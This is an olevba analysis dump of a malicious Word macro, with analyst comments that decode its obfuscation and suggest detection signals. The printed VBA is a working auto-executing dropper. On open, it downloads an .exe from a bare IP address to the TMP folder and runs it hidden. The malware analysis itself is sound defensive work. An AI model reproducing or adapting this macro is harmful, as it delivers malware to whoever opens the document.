
Malicious Word macro

dynamoo Mar 13th, 2015 326 Never
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. XML:MAS---- 2773kxh.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 2773kxh.doc
  10. Type: Word2003_XML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: editdata.mso - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Analyst note: auto-executing entry point. olevba flags AutoOpen as running when
  ' the Word document is opened; the only thing this Sub does is call z4vF73d.
  15. Sub autoopen()
  16. z4vF73d
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO ÀâïàâÀ.bas
  27. in file: editdata.mso - OLE stream: u'VBA/\u0410\u0432\u043f\u0430\u0432\u0410'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  ' Analyst note: string de-obfuscation helper. Walks the input with Step 2 and
  ' appends the character at positions 1, 3, 5, ... to the return value, so every
  ' second character of the input is filler that gets discarded.
  ' olevba reports "No suspicious keyword" for this module because the helper uses
  ' only Len/Mid; its role is visible only from the calls made in z4vF73d.
  30. Public Function IOVANMdhjbAO(ySIzNYGGtuUeqS As String) As String
  31. For QpHTHEyQNlU = 1 To Len(ySIzNYGGtuUeqS) Step 2
  32. IOVANMdhjbAO = IOVANMdhjbAO & Mid(ySIzNYGGtuUeqS, QpHTHEyQNlU, 1)
  33. Next
  34. End Function
  35. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  36. ANALYSIS:
  37. No suspicious keyword or IOC found.
  38. -------------------------------------------------------------------------------
  39. VBA MACRO ÀÏÀÂÏàâïâ.bas
  40. in file: editdata.mso - OLE stream: u'VBA/\u0410\u041f\u0410\u0412\u041f\u0430\u0432\u043f\u0432'
  41. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Analyst note: imports URLDownloadToFileA from urlmon under an obfuscated alias.
  ' The #If VBA7 branch is the PtrSafe/LongPtr form of the declaration; the #Else
  ' branch is the same import with Long arguments. Both bind the same API.
  ' Argument order follows the API: caller, URL, destination file name, reserved,
  ' status callback.
  ' NOTE(review): the accented identifiers look like Cyrillic names rendered in the
  ' wrong code page (the OLE stream names in this report are Cyrillic) - confirm
  ' against the original sample before using them in signatures.
  42. #If VBA7 Then
  43.     Private Declare PtrSafe Function ÌÐÎìîðÌÐÎàâï Lib "urlmon" Alias _
  44.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  45.     ByVal ÏÀÌÎÐâûà As String, _
  46.     ByVal ÏÀÌÎÐâûàf As String, _
  47.     ByVal ÏÀÌÎÐâûàfd As Long, _
  48.     ByVal ÏÀÌÎÐâûàfds As LongPtr) As LongPtr
  49. #Else
  50.     Private Declare Function ÌÐÎìîðÌÐÎàâï Lib "urlmon" Alias _
  51.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
  52.     ByVal ÏÀÌÎÐâûà As String, _
  53.     ByVal ÏÀÌÎÐâûàf As String, _
  54.     ByVal ÏÀÌÎÐâûàfd As Long, _
  55.     ByVal ÏÀÌÎÐâûàfds As Long) As Long
  56. #End If
  ' Analyst note: builds the two arguments for the download-and-run function below.
  ' Each string is assembled from Chr$() codes and then passed through IOVANMdhjbAO,
  ' which keeps only the odd-position characters.
  ' Decoded by hand from the Chr$ sequences (defanged; re-verify before using as IoCs):
  '   argument 1 (source URL) : hxxp://95.163.121[.]186/api/gbb1.exe
  '   Environ() variable name : TMP
  '   appended file name      : \GHjkdfg.exe
  ' This is why olevba shows flags M, A and S but no I (IOCs): the URL never appears
  ' as a literal in the macro source, so static keyword/IOC matching alone misses it.
  57. Sub z4vF73d()
  58. ïðïàðûâà IOVANMdhjbAO(Chr$(104) & Chr$(56) & Chr$(116) & Chr$(65) & Chr$(116) & Chr$(92) & Chr$(112) & Chr$(85) & Chr$(58) & Chr$(52) & Chr$(47) & Chr$(78) & Chr$(47) & Chr$(127) & Chr$(57) & Chr$(127) & Chr$(53) & Chr$(79) & Chr$(46) & Chr$(96) & Chr$(49) & Chr$(120) & Chr$(54) & Chr$(74) & Chr$(51) & Chr$(112) & Chr$(46) & Chr$(72) & Chr$(49) & Chr$(118) & Chr$(50) & Chr$(53) & Chr$(49) & Chr$(102) & Chr$(46) & Chr$(53) & Chr$(49) & Chr$(75) & Chr$(56) & Chr$(63) & Chr$(54) & Chr$(98) & Chr$(47) & Chr$(66) & Chr$(97) & Chr$(110) & Chr$(112) & Chr$(78) & Chr$(105) & Chr$(99) & Chr$(47) & Chr$(110) & Chr$(103) & Chr$(103) & Chr$(98) & Chr$(125) & Chr$(98) & Chr$(58) & Chr$(49) & Chr$(86) & Chr$(46) & Chr$(101) & Chr$(101) & Chr$(104) & Chr$(120) & Chr$(122) & Chr$(101) & Chr$(68)) _
  59. , Environ(IOVANMdhjbAO(Chr$(84) & Chr$(99) & Chr$(77) & Chr$(70) & Chr$(80) & Chr$(83))) & IOVANMdhjbAO(Chr$(92) & Chr$(97) & Chr$(71) & Chr$(129) & Chr$(72) & Chr$(81) & Chr$(106) & Chr$(79) & Chr$(107) & Chr$(110) & Chr$(100) & Chr$(91) & Chr$(102) & Chr$(96) & Chr$(103) & Chr$(80) & Chr$(46) & Chr$(128) & Chr$(101) & Chr$(84) & Chr$(120) & Chr$(43) & Chr$(101) & Chr$(39))
  60. End Sub
  ' Analyst note: download-and-execute stage. Line 62 calls the aliased
  ' URLDownloadToFileA import to fetch zOF3 (URL) into Dm4y (local path); line 63
  ' passes that same path to Shell with window style 0 (vbHide), so no window is shown.
  ' The download result is stored but never checked, and the declared Boolean return
  ' value is never assigned.
  ' Detection pointers: an Office process writing an .exe under the TMP directory and
  ' then launching it, and an outbound HTTP request from Word to a bare IP address.
  61. Function ïðïàðûâà(zOF3 As String, Dm4y As String) As Boolean
  62. âûàûâÀÀâûà = ÌÐÎìîðÌÐÎàâï(0&, zOF3, Dm4y, 0&, 0&)
  63. ïðïàÀàï = Shell(Dm4y, 0)
  64. End Function
  65.  
  66.  
  67.  
  68.  
  69. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  70. ANALYSIS:
  71. +------------+--------------------+-----------------------------------------+
  72. | Type       | Keyword            | Description                             |
  73. +------------+--------------------+-----------------------------------------+
  74. | Suspicious | Lib                | May run code from a DLL                 |
  75. | Suspicious | Shell              | May run an executable file or a system  |
  76. |            |                    | command                                 |
  77. | Suspicious | Environ            | May read system environment variables   |
  78. | Suspicious | Chr                | May attempt to obfuscate specific       |
  79. |            |                    | strings                                 |
  80. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  81. +------------+--------------------+-----------------------------------------+
  82. -------------------------------------------------------------------------------
  83. VBA MACRO Class1.cls
  84. in file: editdata.mso - OLE stream: u'VBA/Class1'
  85. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Analyst note: filler routine. A DoEvents loop whose upper bound is a name not
  ' declared anywhere in this listing, followed by a string assignment that is never
  ' read. Nothing in the macro code shown in this report calls it; it appears to be
  ' padding - TODO confirm against the full project.
  86. Public Sub VJfmjcZhYHWzt89()
  87. Dim caEhbvHeVNIEE28 As Integer
  88. For caEhbvHeVNIEE28 = 8 To wn
  89. DoEvents
  90. Next caEhbvHeVNIEE28
  91. Dim DcsgpIlJKVLll87 As String
  92. DcsgpIlJKVLll87 = "UDMGtgGDgYjFI65"
  93. End Sub
  94.  
  ' Analyst note: filler routine. A DoEvents loop whose upper bound is a name not
  ' declared anywhere in this listing, followed by a string assignment that is never
  ' read. Nothing in the macro code shown in this report calls it.
  95. Public Sub rEFykkBadCmlT28()
  96. Dim PxdhIsVstODSN96 As Integer
  97. For PxdhIsVstODSN96 = 6 To zo
  98. DoEvents
  99. Next PxdhIsVstODSN96
  100. Dim lyRYKztwOtcCv68 As String
  101. lyRYKztwOtcCv68 = "QpVdrqKVaheqW83"
  102. End Sub
  103.  
  ' Analyst note: filler routine. A DoEvents loop whose upper bound is a name not
  ' declared anywhere in this listing, followed by a string assignment that is never
  ' read. Nothing in the macro code shown in this report calls it.
  104. Public Sub xHCiwNdMbiMXH41()
  105. Dim DMjDUoNwJkvod99 As Integer
  106. For DMjDUoNwJkvod99 = 6 To AZ
  107. DoEvents
  108. Next DMjDUoNwJkvod99
  109. Dim MbOCKZMnWgyDP71 As String
  110. MbOCKZMnWgyDP71 = "dLnHyOaEiCcXm17"
  111. End Sub
  112.  
  ' Analyst note: filler routine. A DoEvents loop whose upper bound is a name not
  ' declared anywhere in this listing, followed by a string assignment that is never
  ' read. Nothing in the macro code shown in this report calls it.
  113. Public Sub pRsFNsbPhfYFW88()
  114. Dim hZLjOUpaCBMMS47 As Integer
  115. For hZLjOUpaCBMMS47 = 7 To Hd
  116. DoEvents
  117. Next hZLjOUpaCBMMS47
  118. Dim iqHqrfwpCwVKm36 As String
  119. iqHqrfwpCwVKm36 = "TZxKCjtsLEbMO94"
  120. End Sub
  121.  
  ' Analyst note: filler routine. A DoEvents loop whose upper bound is a name not
  ' declared anywhere in this listing, followed by a string assignment that is never
  ' read. Nothing in the macro code shown in this report calls it.
  122. Public Sub qWpQUsRUDvlHS43()
  123. Dim IdGlnffOOYXKa12 As Integer
  124. For IdGlnffOOYXKa12 = 4 To BO
  125. DoEvents
  126. Next IdGlnffOOYXKa12
  127. Dim jYPxUyallTLis72 As String
  128. jYPxUyallTLis72 = "WIblPzwJHhazc55"
  129. End Sub
  130.  
  ' Analyst note: filler routine. A DoEvents loop whose upper bound is a name not
  ' declared anywhere in this listing, followed by a string assignment that is never
  ' read. Nothing in the macro code shown in this report calls it.
  131. Public Sub ljeCsroJoUhyE78()
  132. Dim VlLLfBEgYlxNH62 As Integer
  133. For VlLLfBEgYlxNH62 = 3 To Uz
  134. DoEvents
  135. Next VlLLfBEgYlxNH62
  136. Dim BBwgLcWwNGMPI35 As String
  137. BBwgLcWwNGMPI35 = "gqyUHUrqCVfvX89"
  138. End Sub
  139.  
  ' Analyst note: filler routine. A DoEvents loop whose upper bound is a name not
  ' declared anywhere in this listing, followed by a string assignment that is never
  ' read. Nothing in the macro code shown in this report calls it.
  140. Public Sub htVyaunRmFwQL32()
  141. Dim TjUvVjOmkCGbi21 As Integer
  142. For TjUvVjOmkCGbi21 = 8 To QX
  143. DoEvents
  144. Next TjUvVjOmkCGbi21
  145. Dim rLdSRlDmsMiEB93 As String
  146. rLdSRlDmsMiEB93 = "uBpzNGLNvRppY68"
  147. End Sub
  148.  
  ' Analyst note: filler routine. A DoEvents loop whose upper bound is a name not
  ' declared anywhere in this listing, followed by a string assignment that is never
  ' read. Nothing in the macro code shown in this report calls it.
  149. Public Sub yETfojXKzCRAj76()
  150. Dim pOEEEDavfUYoV65 As Integer
  151. For pOEEEDavfUYoV65 = 1 To ej
  152. DoEvents
  153. Next pOEEEDavfUYoV65
  154. Dim mgSnlzcAerxTa65 As String
  155. mgSnlzcAerxTa65 = "ZlbRmltyNfIuf63"
  156. End Sub
  157.  
  ' Analyst note: filler routine. A DoEvents loop whose upper bound is a name not
  ' declared anywhere in this listing, followed by a string assignment that is never
  ' read. Nothing in the macro code shown in this report calls it.
  158. Public Sub pEXQlfifgpFAb63()
  159. Dim kIPGmTHKqlBzS46 As Integer
  160. For kIPGmTHKqlBzS46 = 1 To fc
  161. DoEvents
  162. Next kIPGmTHKqlBzS46
  163. Dim TmBfAKqohhFMq17 As String
  164. TmBfAKqohhFMq17 = "oRtXhFaWkBPgf45"
  165. End Sub
  166.  
  167.  
  168. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  169. ANALYSIS:
  170. No suspicious keyword or IOC found.